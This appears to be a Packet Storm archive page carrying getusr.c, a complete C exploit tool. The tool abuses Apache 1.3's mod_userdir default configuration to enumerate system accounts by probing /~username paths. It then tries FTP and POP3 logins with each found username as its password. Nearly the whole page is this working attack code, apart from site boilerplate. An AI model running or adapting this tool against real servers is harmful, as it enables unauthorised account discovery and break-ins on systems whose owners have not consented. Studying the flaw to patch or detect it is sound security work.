Exploit that makes use of the mod_userdir vulnerability in various Apache 1.3 and 2.x servers.
8662511387d1c9dfabc4db3091ec50b0/*
* getusr.c by CoKi <coki@nosystem.com.ar>
*
* This tool tries to find users in a Apache 1.3.*
* server through wrong default configuration of
* module mod_userdir
*
* Use: ./getusr [options] -h <host> -u <usrfile>
* -h Host
* -u Users file
* Options
* -f Try log on via FTP
* -p Try log on via POP3
*
* No System Group - http://www.nosystem.com.ar
*
*/
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <errno.h>
#include <string.h>
#include <getopt.h>
#include <netdb.h>
#include <sys/types.h>
#include <sys/fcntl.h>
#include <sys/time.h>
#include <netinet/in.h>
#include <sys/socket.h>
#define DATAMAX 50
#define BUFFER 1000
#define ERROR -1
#define TIMEOUT 3
#define HTTP_PORT 80
#define FTP_PORT 21
#define POP3_PORT 110
void use(char *program);
int connect_timeout(int sfd, struct sockaddr *serv_addr, socklen_t addrlen,
int timeout);
void vrfy_apache(char *host);
void vrfy_vuln(char *host);
int test_user(char *host, char *user);
int trylogonFTP(char *host, char *user, char *pass);
int mkconn(char *host, int port);
int trylogonPOP3(char *host, char *user, char *pass);
struct hostent *he;
char **fuser;
int sockfd;
struct sockaddr_in dest_dir;
int main(int argc, char *argv[]) {
FILE *userlist;
char c, *host=NULL, *ulist=NULL;
char user[DATAMAX];
int ucant=0, cant=0, flogged=0, plogged=0, optftp=0, optpop=0, stop=0, i;
if(argc < 2) use(argv[0]);
while((c = getopt(argc, argv, "h:u:fp")) != EOF) {
switch(c) {
case 'h':
host = optarg;
break;
case 'u':
ulist = optarg;
break;
case 'f':
optftp = 1;
break;
case 'p':
optpop = 1;
break;
default :
use(argv[0]);
break;
}
}
if(host == NULL) use(argv[0]);
if(ulist == NULL) use(argv[0]);
printf("\n getusr.c by CoKi <coki@nosystem.com.ar>\n\n");
printf(" [+] verifying list:\t");
fflush(stdout);
if((userlist = fopen(ulist, "r")) == NULL) {
printf("Failed\n\n");
exit(1);
}
while(!feof(userlist)) if('\n' == fgetc(userlist)) ucant++;
rewind(userlist);
printf("OK (%d users)\n", ucant);
fuser = (char **)malloc(sizeof(ucant));
printf(" [+] verifying host:\t");
fflush(stdout);
if((he=gethostbyname(host)) == NULL) {
herror("Error");
printf("\n");
exit(1);
}
printf("OK\n");
printf(" [+] connecting:\t");
fflush(stdout);
if(mkconn(host, HTTP_PORT) == ERROR) {
printf("Closed\n\n");
exit(1);
}
printf("OK\n");
close(sockfd);
vrfy_apache(host);
vrfy_vuln(host);
printf(" [+] searching for system accounts...\n");
fflush(stdout);
while(!feof(userlist)) {
if(fgets(user, sizeof(user), userlist) == NULL) break;
user[strlen(user)-1] = '\0';
if(test_user(host, user) == 0) {
printf(" found: %s\n", user);
fuser[cant] = (char *)malloc(sizeof(user));
memcpy(fuser[cant],user,strlen(user));
memset(fuser[cant]+strlen(user),0,1);
cant++;
}
}
if(cant == 0) {
printf(" no users found\n\n");
exit(1);
}
if(optftp == 1) {
stop = 0;
printf(" [+] trying log on via FTP...\n");
printf(" [+] connecting:\t");
fflush(stdout);
if(mkconn(host, FTP_PORT) == ERROR) {
printf("Closed\n");
stop = 1;
}
if(!stop) {
printf("OK\n");
close(sockfd);
for(i=0; i < cant; i++) {
if(trylogonFTP(host, fuser[i], fuser[i]) == 0) {
printf(" logged in: %s\n", fuser[i]);
flogged++;
}
}
if(flogged == 0) printf(" no users logged in\n");
}
}
if(optpop == 1) {
stop = 0;
printf(" [+] trying log on via POP3...\n");
printf(" [+] connecting:\t");
fflush(stdout);
if(mkconn(host, POP3_PORT) == ERROR) {
printf("Closed\n");
stop = 1;
}
if(!stop) {
printf("OK\n");
close(sockfd);
for(i=0; i < cant; i++) {
if(trylogonPOP3(host, fuser[i], fuser[i]) == 0) {
printf(" logged in: %s\n", fuser[i]);
plogged++;
}
}
if(plogged == 0) printf(" no users logged in\n");
}
}
printf("\n");
fclose(userlist);
}
void use(char *program) {
printf("Use: %s [options] -h <host> -u <usrfile>\n", program);
printf(" -h\tHost\n");
printf(" -u\tUsers file\n");
printf(" Options\n");
printf(" -f\tTry log on via FTP\n");
printf(" -p\tTry log on via POP3\n");
exit(1);
}
int connect_timeout(int sfd, struct sockaddr *serv_addr, socklen_t addrlen,
int timeout) {
int res, slen, flags;
struct timeval tv;
struct sockaddr_in addr;
fd_set rdf, wrf;
fcntl(sfd, F_SETFL, O_NONBLOCK);
res = connect(sfd, serv_addr, addrlen);
if (res >= 0) return res;
FD_ZERO(&rdf);
FD_ZERO(&wrf);
FD_SET(sfd, &rdf);
FD_SET(sfd, &wrf);
bzero(&tv, sizeof(tv));
tv.tv_sec = timeout;
if (select(sfd + 1, &rdf, &wrf, 0, &tv) <= 0)
return -1;
if (FD_ISSET(sfd, &wrf) || FD_ISSET(sfd, &rdf)) {
slen = sizeof(addr);
if (getpeername(sfd, (struct sockaddr*)&addr, &slen) == -1)
return -1;
flags = fcntl(sfd, F_GETFL, NULL);
fcntl(sfd, F_SETFL, flags & ~O_NONBLOCK);
return 0;
}
return -1;
}
void vrfy_apache(char *host) {
char buf[BUFFER], sendstr[DATAMAX];
printf(" [+] verifying Apache:\t");
fflush(stdout);
if(mkconn(host, HTTP_PORT) == ERROR) printf("Closed\n");
sprintf(sendstr, "HEAD / HTTP/1.0\n\n");
send(sockfd, sendstr, sizeof(sendstr), 0);
bzero(buf, sizeof(buf));
recv(sockfd, buf, sizeof(buf), 0);
if(strstr(buf, "Server: Apache")) printf("OK\n");
else {
printf("NO\n\n");
exit(1);
}
close(sockfd);
}
void vrfy_vuln(char *host) {
char buf[BUFFER], sendstr[DATAMAX];
printf(" [+] vulnerable:\t");
fflush(stdout);
if(mkconn(host, HTTP_PORT) == ERROR) printf("Closed\n");
bzero(sendstr, sizeof(sendstr));
sprintf(sendstr, "GET /~root\n");
send(sockfd, sendstr, sizeof(sendstr), 0);
recv(sockfd, buf, sizeof(buf), 0);
if(strstr(buf, "403")) printf("OK\n");
else {
printf("NO\n\n");
exit(1);
}
close(sockfd);
}
int test_user(char *host, char *user) {
char buf[BUFFER], sendstr[DATAMAX];
if(mkconn(host, HTTP_PORT) == ERROR) printf(" Closed\n");
bzero(sendstr, sizeof(sendstr));
sprintf(sendstr, "GET /~%s\n", user);
send(sockfd, sendstr, sizeof(sendstr), 0);
recv(sockfd, buf, sizeof(buf), 0);
if(strstr(buf, "403")) return 0;
else return 1;
close(sockfd);
}
int trylogonFTP(char *host, char *user, char *pass) {
char buf[BUFFER], *senduser, *sendpass;
senduser = malloc(sizeof(user+6));
sendpass = malloc(sizeof(pass+6));
sprintf(senduser,"USER %s\n",user);
sprintf(sendpass,"PASS %s\n",pass);
if(mkconn(host, FTP_PORT) == ERROR) printf(" Closed\n");
bzero(buf,sizeof(buf));
recv(sockfd,buf,sizeof(buf),0);
send(sockfd,senduser,strlen(senduser), 0);
bzero(buf,sizeof(buf));
recv(sockfd,buf,sizeof(buf),0);
send(sockfd,sendpass,strlen(sendpass), 0);
bzero(buf,sizeof(buf));
recv(sockfd,buf,sizeof(buf),0);
if(strstr(buf, "230")) return 0;
else return 1;
close(sockfd);
}
int mkconn(char *host, int port) {
if((sockfd=socket(AF_INET, SOCK_STREAM, 0)) == ERROR) {
perror("Error");
printf("\n");
exit(1);
}
dest_dir.sin_family = AF_INET;
dest_dir.sin_port = htons(port);
dest_dir.sin_addr = *((struct in_addr *)he->h_addr);
bzero(&(dest_dir.sin_zero), 8);
if(connect_timeout(sockfd, (struct sockaddr *)&dest_dir, sizeof(struct sockaddr), TIMEOUT) == ERROR) {
return ERROR;
}
return 0;
}
int trylogonPOP3(char *host, char *user, char *pass) {
char buf[BUFFER], *senduser, *sendpass;
senduser = malloc(sizeof(user+6));
sendpass = malloc(sizeof(pass+6));
sprintf(senduser,"USER %s\n",user);
sprintf(sendpass,"PASS %s\n",pass);
if(mkconn(host, POP3_PORT) == ERROR) printf(" Closed\n");
bzero(buf,sizeof(buf));
recv(sockfd,buf,sizeof(buf),0);
send(sockfd,senduser,strlen(senduser), 0);
bzero(buf,sizeof(buf));
recv(sockfd,buf,sizeof(buf),0);
send(sockfd,sendpass,strlen(sendpass), 0);
bzero(buf,sizeof(buf));
recv(sockfd,buf,sizeof(buf),0);
if(strstr(buf, "+OK")) return 0;
else return 1;
close(sockfd);
}
© 2012 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed
Comments
No comments yet, be the first!